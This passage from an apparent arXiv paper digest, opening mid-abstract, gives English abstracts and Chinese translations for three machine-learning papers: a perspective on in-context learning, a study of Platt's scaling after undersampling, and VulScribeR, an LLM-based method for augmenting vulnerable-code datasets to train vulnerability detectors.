and in applying what is learned. We discuss broader connections to past literature in meta-learning and goal-conditioned agents, and other perspectives on learning and adaptation. We close by suggesting that research on in-context learning should consider this broader spectrum of in-context capabilities and types of generalization.
Updated: 2024-12-05 00:05:11
标题: 在环境学习的更广泛范围
摘要: 语言模型从上下文中学习任务的能力引起了广泛的兴趣。在这里,我们提供了一个观点,将这种监督式少样本学习置于更广泛的元学习上下文学习的范围之内。实际上,我们认为任何上下文中非平凡地降低后续预测损失的序列分布都可以被解释为引发一种上下文学习。我们认为这种观点有助于统一语言模型展示的广泛的上下文能力,例如根据指令或角色扮演适应任务,或者外推时间序列。这个观点还揭示了上下文学习在语言依赖的低级处理(例如共指或并行结构)中的潜在根源。最后,采用这种观点强调了泛化的重要性,我们认为可以沿着几个维度研究泛化:不仅是学习新事物的能力,而且是从不同的呈现方式中学习的灵活性,以及应用所学的能力。我们讨论了与元学习和目标条件代理相关的过去文献的更广泛联系,以及有关学习和适应的其他观点。最后,我们建议对上下文学习的研究应该考虑这种更广泛的上下文能力范围和泛化类型。
更新时间: 2024-12-05 00:05:11
领域: cs.CL,cs.LG
Using Platt's scaling for calibration after undersampling -- limitations and how to address them
When modelling data where the response is dichotomous and highly imbalanced, response-based sampling where a subset of the majority class is retained (i.e., undersampling) is often used to create more balanced training datasets prior to modelling. However, the models fit to this undersampled data, which we refer to as base models, generate predictions that are severely biased. There are several calibration methods that can be used to combat this bias, one of which is Platt's scaling. Here, a logistic regression model is used to model the relationship between the base model's original predictions and the response. Despite its popularity for calibrating models after undersampling, Platt's scaling was not designed for this purpose. Our work presents what we believe is the first detailed study focused on the validity of using Platt's scaling to calibrate models after undersampling. We show analytically, as well as via a simulation study and a case study, that Platt's scaling should not be used for calibration after undersampling without critical thought. If Platt's scaling would have been able to successfully calibrate the base model had it been trained on the entire dataset (i.e., without undersampling), then Platt's scaling might be appropriate for calibration after undersampling. If this is not the case, we recommend a modified version of Platt's scaling that fits a logistic generalized additive model to the logit of the base model's predictions, as it is both theoretically motivated and performed well across the settings considered in our study.
Updated: 2024-12-05 00:00:18
标题: 使用Platt的标定方法在欠采样后进行校准 - 限制和应对方法
摘要: 在对数据进行建模时,如果响应变量是二元的且高度不平衡,通常会使用基于响应的抽样方法,在建模之前保留多数类的子集(即欠采样),以创建更平衡的训练数据集。然而,针对这种欠采样数据拟合的模型(我们称之为基本模型)生成的预测结果存在严重的偏差。有几种校准方法可以用来对抗这种偏差,其中之一是Platt缩放。在这里,使用逻辑回归模型来建模基本模型原始预测与响应之间的关系。尽管Platt缩放在欠采样后校准模型时很受欢迎,但它并不是为此目的而设计的。我们的研究提出了我们认为是第一次关注使用Platt缩放校准欠采样后模型有效性的详细研究。我们通过分析、模拟研究和案例研究,展示了Platt缩放在欠采样后校准模型时应该经过深思熟虑。如果Platt缩放能够成功校准基本模型,那么当它在整个数据集上训练时(即没有进行欠采样)Platt缩放可能适用于欠采样后的校准。如果不是这种情况,我们建议使用Platt缩放的修改版本,该版本将逻辑广义加性模型拟合到基本模型预测的logit,因为在我们的研究中考虑的各种设置中,这种方法在理论上是合理的,并且表现良好。
更新时间: 2024-12-05 00:00:18
领域: stat.ME,cs.LG
Exploring RAG-based Vulnerability Augmentation with LLMs
Detecting vulnerabilities is vital for software security, yet deep learning-based vulnerability detectors (DLVD) face a data shortage, which limits their effectiveness. Data augmentation can potentially alleviate the data shortage, but augmenting vulnerable code is challenging and requires a generative solution that maintains vulnerability. Previous works have only focused on generating samples that contain single statements or specific types of vulnerabilities. Recently, large language models (LLMs) have been used to solve various code generation and comprehension tasks with inspiring results, especially when fused with retrieval augmented generation (RAG). Therefore, we propose VulScribeR, a novel LLM-based solution that leverages carefully curated prompt templates to augment vulnerable datasets. More specifically, we explore three strategies to augment both single and multi-statement vulnerabilities, with LLMs, namely Mutation, Injection, and Extension. Our extensive evaluation across three vulnerability datasets and DLVD models, using two LLMs, show that our approach beats two SOTA methods Vulgen and VGX, and Random Oversampling (ROS) by 27.48%, 27.93%, and 15.41% in f1-score with 5K generated vulnerable samples on average, and 53.84%, 54.10%, 69.90%, and 40.93% with 15K generated vulnerable samples. Our approach demonstrates its feasibility for large-scale data augmentation by generating 1K samples at as cheap as US$ 1.88.
Updated: 2024-12-05 00:00:18
标题: 使用LLMs探索基于RAG的漏洞增强
摘要: 检测漏洞对软件安全至关重要,然而基于深度学习的漏洞检测器(DLVD)面临数据短缺问题,这限制了它们的有效性。数据增强潜在地可以缓解数据短缺问题,但增强易受攻击的代码是具有挑战性的,并需要一种能够保持漏洞性的生成解决方案。先前的研究仅关注生成包含单个语句或特定类型漏洞的样本。最近,大型语言模型(LLMs)已被用于解决各种代码生成和理解任务,并取得了令人鼓舞的结果,尤其是与检索增强生成(RAG)相结合时。因此,我们提出了VulScribeR,这是一种基于LLM的新颖解决方案,利用精心策划的提示模板来增强易受攻击的数据集。更具体地,我们探索了三种策略来增强单语句和多语句漏洞,即Mutation、Injection和Extension。我们在三个漏洞数据集和DLVD模型上进行了广泛评估,使用了两个LLMs,结果显示我们的方法在f1-score上击败了两种SOTA方法Vulgen和VGX,以及随机过采样(ROS)分别为27.48%,27.93%和15.41%,并且在平均生成5K易受攻击样本时分别为53.84%,54.10%,69.90%和40.93%。我们的方法通过以低至1.88美元的成本生成1K样本,展示了其在大规模数据增强方面的可行性。
更新时间: 2024-12-05 00:00:18
领域: cs.SE,cs.CR,cs.LG,D.2.7; I.2.2; D.2.5; I.2.5; I.2.6; C.4; I.5.1